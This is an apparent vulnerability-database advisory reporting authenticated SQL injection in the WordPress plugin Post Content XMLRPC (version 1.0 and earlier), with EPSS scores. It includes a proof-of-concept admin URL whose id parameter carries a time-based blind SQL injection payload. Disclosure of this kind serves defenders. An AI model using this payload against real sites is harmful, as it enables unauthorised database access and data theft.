Lucene search

K
wpvulndbWpvulndbWPVDB-ID:FB42980C-93E5-42D5-A478-C2B348EAEA67
HistoryOct 07, 2021 - 12:00 a.m.

Post Content XMLRPC <= 1.0 - Admin+ SQL Injections

2021-10-0700:00:00
wpscan.com
12
plugin
sql injections
admin dashboard
get/post parameters
authenticated

EPSS

0.001

Percentile

45.2%

The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections

PoC

https://example.com/wp-admin/admin.php?page=pcx_add_sites&amp;mode;=add&amp;id;=1 AND (SELECT 7953 FROM (SELECT(SLEEP(5)))AgUn)

EPSS

0.001

Percentile

45.2%

Related for WPVDB-ID:FB42980C-93E5-42D5-A478-C2B348EAEA67